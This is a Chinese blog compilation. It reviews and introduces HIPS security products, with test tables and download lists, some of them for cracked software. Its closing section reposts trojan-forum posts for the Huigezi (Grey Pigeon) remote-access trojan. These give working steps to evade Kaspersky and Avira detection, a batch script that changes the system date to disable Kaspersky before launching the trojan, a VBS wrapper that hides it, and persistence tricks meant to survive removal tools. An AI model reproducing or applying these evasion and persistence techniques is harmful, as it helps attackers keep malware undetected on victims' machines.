HIPS软件需要对网络行为进行控制,不仅需要完成主机、端口过滤,也需要对试图访问网络的应用程序进行控制,国外的HIPS软件多数都有网络控制功能。我们可以通过以下几个方面评价HIPS软件的网络控制功能:?
- 进方向连接控制
- 出方向连接控制
- 状态检测
无论个HIPS软件功能设计多么强大,如果它不能很好的保护自己,确保用户所配置的安全策略全部生效,那么终归也仅仅是个摆设。如果一个恶意代码能够关 闭、禁用或破坏HIPS,那么结果就是主机没有受到任何保护。设计精良的HIPS软件必须能对自身的资源进行保护,包括配置文件、关键进程等。
- 规则保护
- 防止进程终止
优秀的HIPS软件还会提供类似于进程管理、系统诊断类工具,使用户可以通过这些工具发现和定位系统中存在的问题,附加工具的多少,效果如何,都在一定程度上决定了HIPS软件的可用性。
实际环境挑战
为了更加真实地模拟HIPS的实际使用环境,笔者除了进行上述功能测试外,还进行了渗透性测试、病毒及流氓软件样本测试、恶意网站测试三类实际环境测试, 这些实际测试综合考察了一个HIPS产品各个方面的功能,从更加客观的角度描述了HIPS产品在实际防御黑客攻击时所能起到的作用。
专用工具渗透性测试
渗透测试是一种无害测试,测试程序通常由安全专家或独立的安全评测机构编写,这些测试程序试图故意跳过主机安全工具的检查。这种测试的理念是:“如果这些工具采用的技术能够通过您计算机上的安全防护,那么黑客也一样可以利用这些技术”。
渗透工具本身并不具有任何破坏力,他们只是为了让您能清楚地知道自己所安装的主机安全工具能够提供哪些功能,这些工具的安全防护是否彻底,安全模型是否有效。在本次测试中,本人精选了8个渗透性测试工具,它们基本涵盖了目前流行的攻击手段,如下表:
- Leaktest
- Tooleaky
- Firehole
Firehole在执行时会从自身释放出一个firedll的dll文件,这个dll文件具有钩子功能,可以操作IE带出数据,filehole通过这个钩子访问指定地址的80端口。
- Copycat
- Pcflankleaktest
- Wallbreaker
- Jumper
- Pcaudit
病毒及流氓软件样本测试
在本次测试中,笔者还使用了真正的病毒和流氓软件样本、恶意网站进行测试,这种测试将更具实战意义。
病毒样本:熊猫烧香
流氓软件样本:CNNIC上网助手
测试产品总评价表
项目名称 产品名称
SNS SSM CA HIPS ProSecurity GSS Winpooch 中网S3 微点 EQSecure
安装及运行类
安装速度、容易度 √ √ √ √ ○ √ √ √ √
磁盘及内存需求 √ √ √ √ √ √ √ × √
系统资源占用 √ √ ○ ○ √ √ √ ○ √
是否易于使用 √ × √ ○ √ × √ √ ○
系统稳定性 √ √ √ ○ ○ √ √ ○ √
使用手册,在线帮助 √ ○ ○ √ ○ × √ √ ○
应用程序控制类 AD
已知程序运行控制 √ √ √ √ √ × √ × √
未知程序运行控制 × √ √ √ √ × √ × √
已更改程序运行控制 √ √ √ √ √ × √ × √
自启动程序控制 ○ ○ ○ ○ ○ ○ ○ × ○
创建子进程控制 √ √ √ × √ × √ × √
打开进程控制 × × √ × × × √ × ×
DLL注入控制 √ √ √ √ √ × √ √ √
打开网络连接控制 √ √ √ √ √ × √ √ ×
OLE对象控制 × ○ √ × ○ × √ × ×
文件控制类 FD
文件保护控制 ○ × ○ √ × ○ ○ × ○
注册表控制类 RD
注册表保护控制 ○ ○ √ √ √ ○ ○ × √
网络控制类 ND
进方向连接控制 √ × √ × √ × √ ○ ×
出方向连接控制 √ × √ × √ × √ ○ ×
状态检测 √ × √ × √ × √ ○ ×
自身安全类
规则保护 √ √ × √ × × √ √ √
防止进程终止 √ √ × × ○ ○ × × √
附加工具类
附加工具是否足够 一般 不错 不错 少 少 一般 不错 不错 少
渗透性测试
Leaktest √ √ √ √ √ × √ √ ×
Tooleaky √ √ √ √ √ × √ × √
Firehole ○ √ √ √ √ × √ × √
Copycat ○ √ √ √ √ × √ ○ √
PCFlank × × √ × × × √ × ×
WallBreaker × √ √ × √ × √ × √
Jumper √ √ √ √ √ √ √ × √
pcaudit √ √ √ √ √ √ √ × √
病毒、流氓软件、恶意网站测试
熊猫烧香 ○ √ √ √ √ × √ ○ √
CNNIC上网助手 √ √ √ √ √ √ √ × √
总评
评价级别 ★★★★ ★★★ ★★★★☆ ★★ ★★★ ★ ★★★★ ★ ★★★
印象最深的三款产品
通过这次测试,我们对市场上HIPS产品有了一定的了解,其中3款产品给我们留下了深刻印象。
- CA Host-Based Intrusion Prevention System
CA HIPS是本次测试中当之无愧的第一名,无论在产品功能上还是在实际测试环境中都表现出了优良的品质,这与Tiny多年的个人防火墙积累和CA高超的产品质量控制有关,CA收购Tiny是明智之选。
特别值得指出的是,在pcflank(OLE行为)的测试中,仅有CA和中网S3顺利通过测试。CA HIPS也同时拥有丰富的预置规则,还为企业用户提供了管理平台,各种控制规则的颗粒度非常细,可以对计算机进行精确的保护。
唯一遗憾的是,目前还没有中文版本,HIPS软件本身就具有很高的复杂度,再加上语言差异,可能会把广大国内用户挡在门外。笔者自认为英文不错,但是有些地方还是花了很长时间才搞定。但是如果您英文不错,又有一定专业知识,CA HIPS本人重点推荐。
之所以将CA HIPS的评价定为4星半,除语言原因外,自身安全性不足也是一个重要问题。 - Safe’n’Sec Personal
“大犀牛”是SNS的代名词,在笔者测试的这段时间里,SNS是唯一让我感到惊讶的产品。
在整个测试成绩,特别是实际测试环境中,SNS只能说是不算坏,这恐怕与其预置规则有关。在将SNS与CA进行比较时,发现两者在规则颗粒度上几乎一样,拦截的系统函数也差不多,可是由于测试是在默认安装下进行,SNS没有表现出应有的水平。
在用户界面上,SNS有着几乎完美的软件界面和产品形象,“大犀牛”甚至在卸载时还有将犀牛装回箱子的图片,让人感觉软件整体性非常强。此外,SNS还在 同一界面中提供了傻瓜模式和专家模式,傻瓜模式下用户几乎不用做什么动作,使用非常容易。在专家模式下,SNS也将强大的功能用逻辑性很强的界面表现了出 来,使高级用户更加容易上手。
HIPS之所以没有普及是因为使用复杂,SNS在界面工程上进行了很多有价值的探讨,它将直接影响整个HIPS产业的推广。 - 中网S3主机安全系统
测试完中网S3主机安全系统后,我再次为国产安全软件感到骄傲。
中 网S3在某些程度上已经具备了与国际一流HIPS软件竞争的潜质,在功能上非常完备,是国内不多的同时具有AD/FD/RD/ND的HIPS软件。在实际 测试环境中也表现出色,拿到的成绩竟然略优于久负盛名的SSM,而且在细节上很突出,这可能与中网公司10余年专业安全厂商的经验有关。
中网S3在自身安全性上存在欠缺,希望厂家能在下一版本中有所改进。
如果您希望尝试HIPS技术,又对庞大复杂的英文产品头疼,中网S3主机安全系统将是首选。
期待未来国内HIPS软件能够产生5星级产品。
测试过这些HIPS产品后,笔者认为HIPS软件提出了两个重要思想,一是从应用程序行为入手。当我们不能识别一个应用程序本身是好是坏时,我们可以通过 分析它们的行为判断其功能是否与我们的预期吻合,并借助HIPS的阻止功能禁止恶意行为执行。二是明确保护对象,将关键文件、关键注册表、网络作为资源对 象进行保护,对资源的修改严格控制。
可以看出HIPS使用的是一种不同于特征码检查的技术方式,我们称之为“主动防御”方式。这种方式的好处是可以对未知应用程序进行控制,实时发现并阻止未 知病毒、未知木马或流氓软件运行。在病毒产生和传播速度大大加快,特征库更新滞后的今天,“主动防御”技术无疑具有重大意义。
再从部署层次看,最早的安全保护手段试图在国际出口架设防火墙,但是随后发现无法阻止国内黑客攻击;随后开始架设企业防火墙,但企业内部依然有安全威胁。 比尔盖茨在RSA Conference 2007上的讲话说得真好,“未来的网络边界将会消亡,我们要保护的是城堡中的国王,而不是城堡本身”。这句话预示了HIPS充满希望的未来,因为只有使 用HIPS的主动防御技术,才能真正保护好我们的国王——计算机上的数据和程序。
但是,目前的HIPS软件还存在很多问题,这些问题如不能解决将大大影响HIPS的普及。
首先是易用性问题,目前的HIPS普遍配置复杂度较高,对用户要求较高,弹框数量较高。三高问题将很多初学者挡在了门外,未来的HIPS应当能对应用程序 行为做系统化分析,同时对多个潜在威胁进行提问,减少些术语,多一些操作建议,并具有一定的自动化处理能力。这点在使用SSM时感触尤深,SSM可以捕获 非常多的应用程序行为,但是弹框数量同样巨大,使得用户使用很烦,往往一路“允许”点下去,很容易放过恶意行为。
其次是预置规则问题,有效而完善的预置规则将提高HIPS的可用度,直接在后台阻拦恶意行为。这点SNS和CA HIPS做的不错,大量的预置规则保证了系统安全,有些规则所设计的细节笔者甚至从未注意过。
再次是清理问题,在笔者测试HIPS的过程中曾数次使计算机感染恶意软件,HIPS可以发现,但是由于缺乏清理机制使得对部分软件无法处理,特别是驱动方 式引导以及有守护进程的恶意软件。HIPS像一个罩子,在它正常工作时可以保护系统免受大多数攻击,但是由于误操作或漏洞,操作系统一样会被感染,因此罩 子内部的工作同样重要。这点中网S3和SSM的处理就比较优秀,提供了多种启动项清理,应用程序锁定等功能,可以对已感染系统进行一定修复,杀调守护进 程。
最后是语言问题,HIPS的复杂度是显而易见的,因此对于中国用户来说,中文系统就变得更加重要。在这点上首推当然是国内软件,比较可喜的是某些中文HIPS已经具备了和国际产品抗衡的潜质,如中网S3和EQ,这是广大HIPS爱好者的福音。
总之,随着HIPS产品的不断成熟,端机安全领域即将发生一场重大变革,HIPS的前景是充满光明的,它的出现给对被动防御手段失望的您带来了一线希望,愿HIPS用户群不断扩大,国产HIPS厂商一路走好。
主机未知防御系统(HIPS)软件介绍
HIPS:
Host Intrusion Prevent System 主机入侵防御系统。HIPS是一种能监控你电脑中文件的运行和文件运用了其他的文件以及文 件对注册表的修改,并向你报告请求允许的的软件。如果你阻止了,那么它将无法运行或者更改。比如你双击了一个病毒程序,HIPS软件跳出来报告而你阻止 了,那么病毒还是没有运行的。引用一句话:”病毒天天变种天天出新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。”。 HIPS是以后系统 安全发展的一种趋势,只要你有足够的专业水平,你可以只用HIPS而不需杀毒软件。但是HIPS并不能称为防火墙,最多只能叫做系统防火墙,它不能阻止网 络上其他计算机对你计算机的攻击行为。
因为病毒天天变种天天出新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。
我们个人用的HIPS可以分为3D: AD(Application Defend)--应用程序防御体系、RD(Registry Defend)注册 表防御体系、FD(File Defend)文件防御体系。它通过可定制的规则对本地的运行程序、注册表的读写操作、以及文件读写操作进行判断并允许或禁 止。
目前在有些杀软或防火墙中,也含HIPS功能。
现在市面上较为流行的HIPS软件有SystemSafeMonitor(简称SSM), ProcessGuard(简称PG),GhostSecuritySuite(简称GSS)等
DefenseWall - http://www.softsphere.com/BufferZone SAE/Home/Pro - http://www.trustware.com/
GreenBorder - http://greenborder.com/
Virtual Sandbox - http://www.fortresgrand.com/products/vsb/vsb.htm
VELite - http://www.secureol.com/
SandBoxie - http://sandboxie.com/
RunSafe - http://www.runsafe.com/
1-Defender - http://amustsoft.com/1-defender/
Privacyware Dynamic Security Agent - http://www.privacyware.com
All-Seeing-Eyes - http://www.fortego.com/
Ghost Security Suite - http://www.ghostsecurity.com
GesWall - http://www.gentlesecurity.com/
Process guard - http://www.diamondcs.com.au/processguard/
System safety monitor - http://syssafety.com/
winpooch - http://sourceforge.net/projects/winpooch
winpatrol- http://www.winpatrol.com/
文件保护类:
Parador - http://www.e-securion.com/
SafeSystem - http://www.gemiscorp.com/english/main.html
体验HIPS第二步曲之初级应用篇
1.本文评论不代表官方大众观点,完全是个人测试学习笔记,欢迎拍砖!
2.文中大部份软件下载地址只是为了自己学习方便引用,下载前请杀毒,一切有其它原因引起的问题,与本人无关!
作者:woodenfish (http://wu5yi1.blog.163.com))
日期:2007/01/26深夜 (转载请保留此申明)
前言:HIPS优秀的软件真在太多了,本人爱不释手,于是一边学习一边和大家分享我的心得体会,本文是我的学习笔记! 高手省略。。。欢迎大家拍砖,希望成为新手入门HIPS的另一个不错的学习教程.
一、 2006年度十大流行Hips软件大总结
(一)Tiny Firewall (网络防火墙),http://www.tinysoftware.com
功能:AD+RD+FD+网络防火墙,
优点:
1.AD+RD+FD齐全,自定义设置全面,并有一定的网络防火墙的功能,并有组管理的概念。对系统运行速度制约较小.
2.不拖系统,与SSM兼容性很好,是我用过的所有hips软件中兼容性和稳定性,及在功能上最好的.
缺点:
1.规则设置十分复杂,缺乏磁盘底层保护.
2.Tiny Personal Firewall v6.5.126 TINY的最终纪念版拉,官方不更新了,可惜还没有完整汉化.
国内下载地址:
1.Tiny Firewall 2005 v6.5.126
下载:http://www.crsky.com/soft/160.html
2.Tiny Personal Firewall v6.5.126
下载:http://www.crsky.com/soft/9024.html
(二)Safe'n'Sec (简称SNS或犀牛),http://www.safensoft.com/
功能:AD+FD+RD+反病毒,
优点:
1. 和反病毒软件和个人防火墙极好的兼容性,完全可以取代SSM、PG。绅博汉化了.
2. 具有全部3D配置。系统栏里小犀牛头图标会对危险等级显示警告。
缺点:
1.3D配置及其功能经纬不分明:FD功能在设置和AD+RD的规则混在一起,几百规则鱼龙混杂,分类不清,不易识别;
2.3D配置经纬不全面:FD自定义设置里只有”Creat"、“open”和“Delet”(即“创建”、“打开”和“删除“),而全面的设置应该是”Creat“、”Write"、 “Read”和“Delet";
3.所有预设规则都不能改动;缺乏应有的磁盘底层保护;
4.装后电脑启动速度受到制约,特别是装带反病毒的版本,启动速度更慢;
5.同SSM有冲突,CPU飙升至100%,装了咖啡企业版的朋友如果使用该软件,最好不选File System Activity.
下载地址:
带反病毒的下载地址
http://www.star-force.com/computer_security/download.php?url=safensecav_en_2.0.exe
无带反病毒的下载地址:
http://www.star-force.com/computer_security/download.php?url=safensec_en_2.0.exe
汉化包:绅博论坛有提供,为了安全大家最好去官方下载附件比较好点.
(三).System Safe Monitor (简称SSM), http://syssafety.com/
功能::AD+RD
优点:
1.AD+RD的防护十分全面。官方提供附带中文版本,商业版国内有破解.
2.测试了多款木马、键盘记录机等对自己的机器进行攻防实训,均被其成功截获,底层防御能力相当令人满意.
3.
•可控制机器上哪些程序是允许执行的,当待运行程序被修改时,会报警提示;
•可控制“DLL注入”以及键盘记录机对特定系统函数的调用;
•可控制驱动程序的安装(包括非传统方式的驱动型漏洞-Rootkits);
•可控制诸如存取"\Device\PhysicalMemory"对象这类底层活动;
•可阻止未经认可的代码注入,从而使任何程序都无法插入到合法的程序中以进行有害的活动;
•可控制哪些程序允许启动其它程序、哪些程序不允许被其它程序启动,如:您可以控制您的浏览器不被除Explorer.EXE以外的任何非可信程序启动;
•可在双模式中任选其一,用户模式或管理员模式:管理员模式可设定首选项并加以密码保护防止被更改,而用户模式不能更改任何设定;
•可监控安装新程序时注册表重要分支键的更改,受保护的注册表分支键被尝试更改时将阻止或报警;
•可管理自启动项目、当前进程等,另外提供了服务保护模块,用以监视已安装的系统服务,当新的服务被添加时,会报警提示;
•可(实时)监视"启动菜单"、"启动INI文件分支",以及IE设定等(包括BHO-所谓的浏览器辅助对象,一般都是广告程序、间谍程序等LJ) ;
•可通过标题黑名单过滤器阻止打开指定的窗口或者网页;
•支持外挂任一调试器、反病毒软件等,且该软件的扩展功能均采用外挂插件形式实现,因此极易得到丰富的扩充;
•本身作为服务加载,通过配置、修改可以实现隐秘的进程反杀能力。
缺点:
1.没有FD功能,没有危险等级提示.
2.System Safety Monitor是一款偏向高端的安全软件,提示框弹出过于频繁,只能完全凭使用者的经验判断.
国内下载地址:
System Safety Monitor v2.3.0.610
http://www.crsky.com/soft/5908.html
(四).SafeSystem 2006(简称ss),http://www.gemiscorp.com/
功能:FD
优点:
1. SS的规则自定义比较方便、而且很直观。
2.国内有汉化,破解掉了15天的试用,但还是试用版,只是无时间限制。(试用版和正式版唯一的区别仅在于设置管理员密码而已)
注:SafeSystem 2006的汉化包,直接解压到原安装目录覆盖原文件即可,必须在刚装完SafeSystem但没启动时才能覆盖,否则无法覆盖.
缺点:
1.SS的拦截机制“斩立即”,绝对不能在拦截时,修改提示你的询问操作。
2.运行不稳定,蓝屏、死机频频出现。
国内下载地址:
SafeSystem 2006 V2.0 汉化版
http://www.hanzify.org/?Go=Show::List&ID=11064
(五)Ghost Security Suite(简称GSS),http://www.ghostsecurity.com
功能:AD+RD
优点:
1.资源占用低且灵敏, 和SSM一样拥有AD和RD,兼容在HIPS软件中也是比较好的
2.对恶意软件的防范能力较强大
缺点:
1.没有FD,GSS拦截程序时有延迟,造成一种占内存假死的现象.
国内下载地址:
Ghost Security Suite v2.001 汉化版
http://www.crsky.com/soft/6883.html
(六)ProcessGuard(简称PG), http://www.diamondcs.com.au
功能:AD+RD
优点:
1.操作最简单,可以直接拦截程序钩子和Rootkit.
2.能够保护Windows进程免受其它进程,服务,驱动程序,以及系统上的其它形式的可执行代码的攻击。
缺点:
1.与同类SSM,GSS软件相比,有人说PG防不住,可能功能上还有待加强吧!
国内下载地址:
ProcessGuard v3.410 汉化版
http://www.crsky.com/soft/7951.html
(七)Winpooch(简称看家狗),http://sourceforge.net/projects/winpooch
功能:FD+RD+AD
一条忠实的“看家狗”, 使用api hook技术,可以对几乎所有的可疑操作进行监控、报告或阻止 总结:不仅免费,而且开源
优点:
1.开源免费,任何人可以从其官方网站下载代码,自己编译,有中文语言选择 ,KI0aA * 。
2.winpooch的ad基本上是没有的.主要是FD,RD功能极强(需要自己设置)
3.占资源相当小,可以创建自己的过滤器,Winpooch具有强大的自定义功能。
缺点:
1.兼容性,稳定性一般, 运行不稳定.
2.听说winpooch有个bug,就是不支持中文路径.
3.调整规则工作量大,没有分类设置,对人的技术水平要求极高.
国内下载地址:
Winpooch Watchdog V0.6.4
http://green.crsky.com/soft/4370.html
(八)Parador File Protection PE,http://www.e-securion.com/
功能:FD
优点:
1.是一款优秀的文件监控软件,可以监视系统中各个软件对磁盘的读写。
缺点:
1.仅有FD,可以阻止程序创建文件,不能阻止程序修改已创建的文件, 制约系统运行速度
国内下载地址:
Parador File Protection PE +汉化外挂文件+注册破解
http://soft.mumayi.net/downinfo/3729.html
(九)EQSecure for System, http://www.eqsecure.com
功能: AD+FD+RD, 一款国产HIPS软件.
优点:
1.是国产免费系统防火墙. 目前包括应用程序控制、注册表控制和文件控制三个方面。
2.应用程序控制包括应用程序的执行、库文件加载、驱动程序加载、物理内存访问、物理磁盘访问、服务
安装等12个方面的控制, 可见控制非常细致;
3.注册表控制包括对注册表项及值的修改(新建)、删除的控制;
4.文件控制包括对文件及文件夹的创建、打开、修改、删除的控制,控制非常全面。
5.资源占用低.
缺点:
1.有朋友测试用格硬盘的病毒不能拦截.
2.规则稍多就太拖系统了.
国内下载地址:
EQSpyWatch 2006 V3.1
http://www.eqspywatch.com/download/EQSpyWatchSetup.exe
(十)ProSecurity,http://www.proactive-hips.com/
功能:AD+RD,作者是华人
优点:
1.占用系统资源很少,设定也很简单。同时拥有了AD和RD功能。不亚于GSS,SSM的HIPS.
2.稳定也不错,对于AD控制采用了先进的SHA效验技术
3.提供了免费版本,比专业版本少了底层磁盘控制、程序钩子监视、物理内存保护和防盗取密码等功能.
4.功能界面组合的很好,比较容易上手。目前只有英语和中文简体两种语言.国内有破解版本了!
缺点:
1.兼容性一般,与卡吧不能共存,蓝屏,不知新版本作者有没有修复这个问题了.(与mcafee8.5i兼容性没问题)
下载地址:
ProSecurity 1.26破解版
破解补丁下载: http://www.crkcn.com/uploads/200701/18_144418_ruleeditor.rar
替换文件的方法如下:
使用UNLOCKER选择安装后的RuleEditor.exe文件,选择移动,将它移动到其他任意位置.
在用UNLOCKER选择破解文件,同样选择移动.移动到安装目录里面就可以了.
注意过程中要选择解锁.
原版下载: http://www.crkcn.com/uploads/200701/18_151742_pssetup.rar
Labels: security software
体验HIPS第一步曲之新手入门篇
作者:woodenfish
前言:看到论坛好多新手朋友都在问什么是Hips, 说明了Hips软件的重要性,同时发现网上也没有一篇完整介绍关于Hips的文章,只是整理了此资料,希望大家喜欢,本人刚加入霏凡论坛,希望以后可以和大家交流,学习,祝大家2007年新年快乐!
一、 关于Hips的基本概念.
HIPS:
Host Intrusion Prevent System 主机入侵防御系统。HIPS是一种能监控你电脑中文件的运行和文件运用了其他的文件以及文件对注册表的修改,并向你报告请求允许的的软件。如果你阻止了, 那么它将无法运行或者更改。比如你双击了一个病毒程序,HIPS软件跳出来报告而你阻止了,那么病毒还是没有运行的。引用一句话:”病毒天天变种天天出 新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。”。 HIPS是以后系统安全发展的一种趋势,只要你有足够的专业水平,你可以只用HIPS而不需杀毒软件。但是HIPS并不能称为防火墙,最多只能叫做系统防 火墙,它不能阻止网络上其他计算机对你计算机的攻击行为。
因为病毒天天变种天天出新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。
二、HIPS原理以及和杀毒软件、防火墙的区别.
杀毒软件:
计算机病毒指的是一些具有恶意代码可能危害计算机的程序。
杀毒软件基本上应当具有以下两个基本功能:
1:杀毒-- 即对带毒文件或病毒本身进行查杀的功能。
2:监控-- 一般具有文件监控,网页监控(即监控远程80/8080等常用端口),邮件监控(即监控POP和SMTP端口),等。
能够杀毒防毒的是杀毒软件,不是防火墙。
防火墙:
简单的理解,防火墙是架在两个互相通信主机之间的一个屏障,对非法数据包进行过滤。
我们使用的多数个人防火墙基本具有:防止非法入侵(防止内连) 与 防止本地非法外连 的功能,而SP2系统自带的墙没有后者的功能。
基于这两点,我们可以简单理解防火墙的两个作用:
1:通过阻止非法数据包,防止黑客通过某些手段入侵。
2:防止木马发生外连盗取本地机密信息。个人防火墙没有杀木马的功能,它所做的是在中了木马之后,通过规则禁止其外连以免丢失数据。
现在有不少厂商将自己的杀软和防火墙做成一个网络防护体系,比如:KIS(卡巴) NIS(诺顿) MIS(咖啡)等。。。
HIPS:Host Intrusion Prevent System 主机入侵防御系统
所 谓hips(主机入侵防御体系),亦即系统防火墙。它有别于传统意义上的网络防火墙(nips)。二者但主要区别是:传统的nips网络防只有在你使用网 络的时候,通过特定的 tcp/ip协议来限定用户访问某一ip地址,或者也可以限制互联网用户访问个人用户和服务器终端;而hips是限制进程调,或者禁止更改或者添加注册表 文件。当某进程或者程序试图偷偷运行时,这个行为就会被所hips检测,然后弹出警告,询问用户是否允许运行。一般来说,在用户拥有足够进程相关方面知识 的情况下,装上一个hips软件能非常有效的防止木马或者病毒的偷偷运行,以防中毒、插马的可能性。
比如卡巴,咖啡等也具备有一些hips的功能,但功能上比不了专业的hips软件.
二、 HIPS功能的类别
HIPS功能的类别可以分为3D:
1.AD(Application Defend)应用程序防御体系、
2.RD(Registry Defend)注册表防御体系、
3.FD(File Defend)文件防御体系。
它通过可定制的规则对本地的运行程序、注册表的读写操作、以及文件读写操作进行判断并允许或禁止。
目前在有些杀软或防火墙中,也含HIPS功能。
三、 Hips软件的大全
1.Tiny Firewall (网络防火墙),http://www.tinysoftware.com
功能:AD+RD+FD,
2.Safe'n'Sec (简称SNS或犀牛), http://www.safensoft.com/
功能:AD+FD+RD,
3.SystemSafeMonitor(简称SSM), http://syssafety.com/
功能::AD+RD
4.SafeSystem (简称ss) , http://www.gemiscorp.com/english/main.html
功能:SS(SafeSystem 2006)--FD
5.GhostSecuritySuite(简称GSS),http://www.ghostsecurity.com
功能:AD+RD
6.ProcessGuard(简称PG), http://www.diamondcs.com.au/processguard/
功能:AD+RD
7. Winpooch ,http://sourceforge.net/projects/winpooch
功能:一条忠实的“看家狗”, 使用api hook技术,可以对几乎所有的可疑操作进行监控、报告或阻止。
8. Parador File Protection PE http://www.e-securion.com/
功能:FD
9. EQSecure for System, http://www.eqsecure.com
功能: AD+FD+RD, 一款国产HIPS软件.
10. ProSecurity,http://www.proactive-hips.com/
功能:FD+RD,作者是中国人
11. Privacyware Dynamic Security Agent - http://www.privacyware.com
12. ANTIHOOK 澳大利亚的PD,http://www.infoprocess.com.au/AntiHook.php
13. Arovax Shied美国的,http://www.arovaxshield.com/download.php
14. Malware Sweeper Pro,http://www.malwaresweeper.com/
15. Core Force,http://force.coresecurity.com/index.php?module=base&page=download
16 . Watcher,http://www.donationcoders.com/kubicle/watcher/
17. DefenseWall - http://www.softsphere.com/
18. BufferZone SAE/Home/Pro - http://www.trustware.com/
19. GreenBorder - http://greenborder.com/
20. Virtual Sandbox - http://www.fortresgrand.com/products/vsb/vsb.htm
21. VELite - http://www.secureol.com/
22. SandBoxie - http://sandboxie.com/
23. RunSafe - http://www.runsafe.com/
24. 1-Defender - http://amustsoft.com/1-defender/
25. All-Seeing-Eyes - http://www.fortego.com/ase
26. GesWall - http://www.gentlesecurity.com/
27. winpatrol- http://www.winpatrol.com/
参考文献,更详细的资料可以看看这个:
http://wiki.castlecops.com/HIPS_FAQ
http://wiki.castlecops.com/HIPS/IDP_programs/services
以上资料主要来自以下技术论坛的收集和整理,如有问题可联系本人马上做出修改。
最后感谢:霏凡论坛,绅博GDATA AntiVirenKit(中国)论坛,致博论坛, 风云墙论坛,卡饭论坛等
木马灰鸽子VIP论坛文章分享,告戒大家不要迷信“杀软”
灰鸽子会员收费论坛就这么多精品帖,花100元/年办VIP根本不值得。剩下有不少帖是下载VIP免杀更新的,加壳加花工具的(可能工具里面本身就有捆绑木马供会员下载,我就不上传到清心了),还有些是外部连接下载我已经删除处理(清心不能发连接)
里面有仅次于灰鸽子作者葛军的二号人物凤凰木马鸽子主代理论坛weiwen的原创帖子,不乏对付或摧毁小红伞antivir以及卡巴斯基的方法,全部收费内容供清心网友免费学习!!!
帖子内容介绍:“灰鸽子病毒”由于所谓的“新闻联播”的报道,现已转 入地下,已经不再收VIP会员(原来成为VIP要100元/年),本人“huigezi”(原清心的“jaycn”)破解了几个VIP的ID,上灰鸽子论 坛将VIP或者有“威望”才能看的精华贴整理了一下,发到清心,供大家学习计算机安全高级知识,有一些木马“免杀”(免于杀软查杀)的技术,属“贼”对付 所谓“警察”的技术,给特别是迷信所谓“杀软”(所谓的“杀毒软件”)、“防火墙”的朋友一个警戒,属本人原创帖,我将多个鸽子VIP论坛的精华贴整理到 一起发
100%过卡巴6.0行为的方法
本帖被 weiwen 执行加亮操作(2007-04-04)
在我们新的修改版没有公布出来之前,凤凰会员暂时可用这种方法卡巴6.0的行为拦截。
1.过卡巴6.0的启动拦截的方法:如:在安装名称$(WinDir)\G_Server2006.exe改为$(WinDir)\G_Server2006去除后缀的方法。
2.过两个插入进程的提示方法:只要在高级选择中的1和3不打勾即可。
3.可以重新修改插入进程,这样就100%过卡巴的6.0行为了。
注:通常新用户修改第一步已经OK的了,因为卡巴的默认安装后是不打开进程插入监控的.
经过几天的努力..终于做出了第一次过小红伞的VIP1.23无壳鸽子
大家可以测试一下.. 可以导入配置信息(原配置信息已经删掉.运行了也没关系).
只做了小红伞的免杀..其他都没做..主要是发出来跟大家分享一下...
只能发连接...
刚改了下载连接..现在可以直接下载了!!!
修改方法简单可以这样说
加花打底/定位特征码/查出特征码为输入表的DLL的文件名(DLL文件名无法修改和移动)/ 再移动输入表信息(特征码会自动转移,很BT,红伞似乎会跟着你的变化而变化)/再找一个红伞查杀行走路线的点给NOP掉(本人找不到原理,纯粹靠试 验...原理还需要近一步研究)(因为改特征点已经无用.只能在它的"行走"路线上设卡..)
以上说法可能存在不对之处,请高人指明..
过卡吧主动防御思路
思路就是修改系统时间,达到卡巴实效,然后鸽子运行,然后再把系统时间改回来,首先要准备好你的免杀鸽子
先打开记事本,把以下代码保存为time.bat,(文字全为说明,不用复制)
@echo
set date=%date% 令参数%data%等于现在的日期,一会儿恢复时间用
date 1987-12-18 修改系统时间使卡巴监控失效
ping -n 10 127.0.0.1 等待10秒,10秒后卡巴已经挂了,
start notepad 运行程序(可以换成鸽子)
ping -n 5 127.0.0.1 等待5秒,
date %date% 改回来时间,卡巴又复活了
但是运行的那个DOS窗口实在看着不爽
我们在建个脚本,打开记事本,把以下代码保存为a.vbs
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("time.bat",0)
现在已经隐藏运行了,有条件的可以改造,甚至可以根据这个思路写个小程序
本帖最近评分记录:
凤凰币:10 (By weiwen) | 2007-02-01 11
要过葛军自家专杀很简单,配置的时候无注册,无服务,无后缀,配置出来后改进程,自定义启动方式,反正别用鸽子自带的启动方式就OK了,具体做法就是把配置好的无注册和服务的EXE做成资源,用DELPHI或VB以捆绑方式重新编译下,加入自定义开机启动方式,保证什么自己专杀也傻瓜。
配制的时只选注册表启动一项就可以过专杀
过鸽子自家专杀以及不死神鸽子的制作方法.
首先申明下,此方法需要编程基础,并非人人能掌握.
一:过葛军专杀,首先配置鸽子服务端,记住无注册,无服务,无后缀,不要隐藏进程,注射IE.配置结束后修改注射进程,注射到一些无法结束的系统 进程就行,不过虽然系统进程,但是还是能结束的,为什么?因为注射并非DLL加载,还是有相同的独立进程,经验丰富的老鸟随便就结束掉了,但是糊下菜鸟没 什么问题,上面改完的话已经过掉了IE防漏和一般的专杀,但是运行有问题,因为无启动项.下面把改好进程,测试没问题的服务端再进行免杀,免杀的方法就不 详细说了,相关教程很多,免杀完毕开始过葛军专杀,把配置好的鸽子服务端当作资源,用DELPHI或VB用资源捆绑方式,并加入自定义开机启动方式,如何 开机启动方式还是用注册表吧,写的好的话直接连卡巴主防的注册表监控都过,甚至可以领先于系统启动.到这里,葛军专杀就已经过了,不信的话自己测试去.
二:杀软杀不尽,关机开又来的不死神鸽.首先还是配置,无注册,无服务,注射IE,不隐藏进程,重要的一点,运行后不要删除本身.然后还是修改 进程,免杀等等,这里的鸽子服务端免杀要保证文件都过,内存什么的没什么关系,改完后就开始再次用DELPHI或VB资源捆绑了,这次有点麻烦,要设置好 这个不删除本身服务端的复制路径,同时资源捆绑的文件要本身删除,不留痕迹,还要加入自定义开机启动指向那个运行后不删除自身的服务端,这样就实现了不死 神鸽,运行原理是这样的,开机启动服务端,并且复制到指定路径启动,这样就过了自家专杀,行为,防漏,主动,等等,哪怕被内存查杀,甚至对应文件查杀,只 要保证你的不删除服务端不被查杀,则杀软杀不尽,开机又回来.
黑客守卫者+鸽子免杀=无敌神鸽
[post] 我们都知道凤凰VIP的免杀鸽子很好用,这是公认的,这个鸽子中到家用PC上还可以但要是放到服务器上就有点让人担心了.
